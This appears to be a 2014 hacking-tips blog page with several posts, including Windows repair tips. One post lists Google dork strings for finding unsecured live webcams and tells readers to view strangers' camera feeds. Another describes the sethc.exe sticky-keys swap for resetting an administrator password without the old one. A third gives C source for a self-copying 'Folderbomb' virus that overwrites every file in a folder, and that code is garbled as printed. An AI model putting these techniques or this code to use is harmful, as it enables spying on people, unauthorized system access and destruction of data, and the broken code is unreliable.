Ads

Monday, September 22, 2014

Live Cameras Around The World

This simple technique is called “Google Hacking”. We are just looking for unsecured. cameras around the world and writing a simple string on google hack into them.
 Follow the steps below:
 1) Choose any of these strings to enter on google

 * inurl:”CgiStart?page=”
 * inurl:/view.shtml
 * intitle:”Live View / – AXIS
 * inurl:view/view.shtml
 * inurl:ViewerFrame?Mode=
 * inurl:ViewerFrame?Mode=Refresh
 * inurl:axis-cgi/jpg
 * inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
 * inurl:view/indexFrame.shtml
 * inurl:view/index.shtml
* inurl:view/view.shtml
 * liveapplet
 * intitle:”live view” intitle:axis 
* intitle:liveapplet
 * allintitle:”Network Camera NetworkCamera” (disconnected)
 * intitle:axis intitle:”video server”
 * intitle:liveapplet inurl:LvAppl
 * intitle:”EvoCam” inurl:”webcam.html”
 * intitle:”Live NetSnap Cam-Server feed”
 * intitle:”Live View / – AXIS” * intitle:”Live View / – AXIS 206M”
 * intitle:”Live View / – AXIS 206W”
 * intitle:”Live View / – AXIS 210?
 * inurl:indexFrame.shtml Axis
 * inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
 * intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
 * intitle:snc-z20 inurl:home/
 * intitle:snc-cs3 inurl:home/
 * intitle:snc-rz30 inurl:home/
 * intitle:”sony network camera snc-p1?
 * intitle:”sony network camera snc-m1?
 * site:.viewnetcam.com -www.viewnetcam.com
 * intitle:”Toshiba Network Camera” user login
 * intitle:”netcam live image” (disconnected)
 * intitle:”i-Catcher Console – Web Monitor”

2)Once you have picked one, simply copy it, and paste in on google.

 3)Now choose any result and you will be seeing a live camera.

Remove VIRUS using CMD (Command Prompt)

Virus is a computer program that can copy itself and infect your computer. These viruses can spread via USB/flash drive or from one computer to other computer by few written codes. There are many antivirus software available to remove viruses from computer. But there are some viruses or suspicious files which can’t be removed by any antivirus software. Some suspicious files such as autorun.inf initiate all the viruses in pc. These files must be removed for safe operation of your pc, because they may lead to data loss, software damages etc. Such viruses and files can be removed by using cmd. In this article we will discuss how to remove a virus using command prompt. Following steps can be used to remove a virus using command prompt from your computer.

Steps to follow :-


Step 1 : Go to start menu and type “cmd” in the search box or Start>all programs>accessories>command prompt.


Step 2 : Open the infected drive such as write , d: to go to D drive.


Step 3 : Now type dir/w/a . It will show all the files of the drive including hidden files.


Step 4 : Locate AUTORUN.INF or any Virus and other suspicious files in the directory.


Step 5 : Type command attrib  -r –a –s –h to remove attributes of corresponding file.


Step 6 : Type del autorun.inf to delete autorun.inf file.


Step 7 : Now type del virus name.exe t delete it, eg : del newfolder.exe .

Now delete VIRUS


Step 8 : When you find an Autorun.inf file or any other unusual .exe file just rename it.


Step 9 : Syntax for rename is (rename filename.extension new name ,  for example: (rename autorun.inf virus) to rename autorun.inf file. Here I have renamed it by “virus”.


Step 10 : Now you can access the defected drive without affecting the virus. 


To delete the renamed file go to the defected drive and select the file you renamed.

  • Type cd recycler command.
  • Again type dir/w/a  to locate all file of the folder.
  • Identify malicious files and delete them using above commands.
Congo.... you successfully deleted the VIRUS

Friday, September 19, 2014

How to Fix the "Bootmgr is missing" Error in Windows with CMD

You may get this error while booting your computer. 

Today i'll tell you easy CMD command trick to repair the problem of "Bootmgr is missing" on system startup while booting. So here is the easy solution for it. There are some simple steps to perform this solution.


Steps to perform :-

Step 1: First of all you need a windows operating system cd or you can use a bootable usb pendrive containing the windows O.S.
Note : Read article How to make a USB Bootable .

Step 2: Boot to the System Recovery Options screen. 

Step 3: Select the Startup Repair option. (See screenshot below)
Step 4: Click on Command Prompt

Step 5: Type c: and press <Enter>. 

Step 6: At the C:\ prompt, type cd boot and press <Enter>. 

Step 7: At the C:\Boot prompt, type the following commands and press Enter after each command. 

Code:


bootrec /FixMbr
bootrec /FixBoot
bootrec /RebuildBcd

Step 8: Now close the command prompt, remove the DVD/CD/USB and reboot your computer. 

Congo... you repair the "BootMgr is Missing" problem.

Sunday, September 14, 2014

Change Admin Account password using CMD

In case you forget your windows administrator account password, you can change it without using any password reset software.
What we need to do is, rename the file cmd.exe to sethc.exe, which is in C:\windows\system32  and run the command net user administrator * in the command prompt.

How to do this ?
If you are not an admin privileged user then it is not easy to rename the files under the directory C:\windows\system32. So we need to boot from other OS to rename the file. You can do this using any linux live  CD or the Windows installation CD. (Note:- please take a backup of the files cmd.exe and sethc.exe to another location. If  you loose those files, you can restore it after the password reset)
Windows 7 installation CD will let you launch a command prompt. Type the following command to create a copy of  sethc.exe
copy c:\windows\system32\sethc.exe c:\

Type this command to replace sethc.exe with cmd.exe
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

After renaming the file, boot in to the windows OS and after you see the login screen, press the shift key 5 times. Then you can see the command prompt with admin privilege. (By default this will prompt you the sticky key feature. This is the only feature which can be used before logging into any user account. By default, pressing the shift key 5 times will start the sethc.exe. But in this situation we have renamed the cmd.exe file to sethc.exe so this action must start the command prompt.)
Once you have reached on the command prompt, you can run the command 
net user administrator *
 After run the command it will ask you a new password for the account.
Set the new password for the admin account. (The good thing is, it will not ask you the old password for the confirmation).

If the admin account is not active, you can activate it by running the command net user administrator /active:no

Now, you can login to the administrator account with the new password.

Saturday, September 13, 2014

SIMPLE VIRUS CODING


Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Friday, September 12, 2014

Enable/Disable Task Manager in Windows 7

This time I will show you how to enable and disable Task Manager in windows 7. This trick is quite easy and fully efficient . Sometimes due to system crash or any virus disable your Task Manager then you can easily use this trick in windows .There are several ways to solve this problem but I will tell you the easiest way to solve this problem

Some easy steps to solve the problem ..

Step 1 : Just simply click on start button and type Run in the search box, Open run from the search  result. Or you can simply press win+R to open Run dialog box.
Step 2 : Type regedit in the text field and press Enter to open it.

Step 3 : Now Just simply explore the given address

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\System

Step 4 : After exploring that location you can simply check the right pane of the registry and find the “DisableTaskMgr” value and click on it.

Step 5 : Simply change the value of the key form 1 to 0 to enable Task Manager and 0 to 1 to disable Task Manager. Here 0 stands to disable and 1 stands to enable.

Note : You can simply run this command in REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

Thursday, September 11, 2014

Top 10 Hidden Features of Windows 7

Now, today I'll show you some hidden windows 7 tricks that will help you using some extra features in it. These tricks work successfully and tested by me.

1. GOD MODE
It may be hyperbolically named, but Windows 7's God Mode is indeed omnipresent. One of the secrets of Windows 7 that is undocumented by Microsoft is the secret option known as God Mode.

GodMode is simply a hidden control panel that contains everything about Windows 7 configuration options and settings, all located in one place plus additional features that are not easily found in the ordinary Control Panel.

This utility will either enable or disable this functionality. When enabled, it will create a short-cut to the God Mode window on a users desktop. When disabled, this short-cut will obviously be removed.


To turn on God Mode, create a new folder on your desktop--or anywhere you'd like--and name it: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}. Don't include the final period. The resulting folder will contain 270 items, representing virtually every configurable option in Windows 7.

2. Enhanced Calculator
Windows' built-in calculator hasn't really changed much over the years, but Windows 7's calculator has a few extra tricks up its sleeve, which you'll find under the View menu. It can do myriad kinds of unit conversion (temperature, weight, area, and eight others), interesting date calculations, and even has worksheets to calculate a mortgage payment or a car's fuel mileage. It maintains a history of your previous calculations as long as the program is open.



5. Problem Steps Recorder
When you need outside PC help, it's much better to let them see for themselves what's happening on your system. But if remote access isn't an option, the Problem Steps Recorder may be the next best thing. 

Search for and run "psr" from the Start menu. Click Start Record, and the utility will record your activities through a series of screen shots, automatically including captions that show exactly where you clicked. You can also use the Add Comment button to highlight specific areas of the screen and insert custom annotations. When you stop recording, everything will be stitched together and saved as a Web browser-compatible MHTML (MIME HTML) file, conveniently pre-ZIPped and ready for e-mailing to your geek of choice.

8. Wipe Free Disk Space08
It's no secret (or at least, it shouldn't be) that when you delete files or folders in Windows, they're not actually erased—the space they took up is simply marked as "available for use," which allows the files to be recoverable (with the right software) until they're overwritten with new data. 

There is a utility built-into Windows (even XP Pro and Vista) that will overwrite all the free space on a hard drive, insuring any files you've deleted stay dead. Launch a command prompt and type cipher /w:X where X is the letter of the drive or partition you want to wipe. Be patient—the process can take a long time if you have a lot of free space.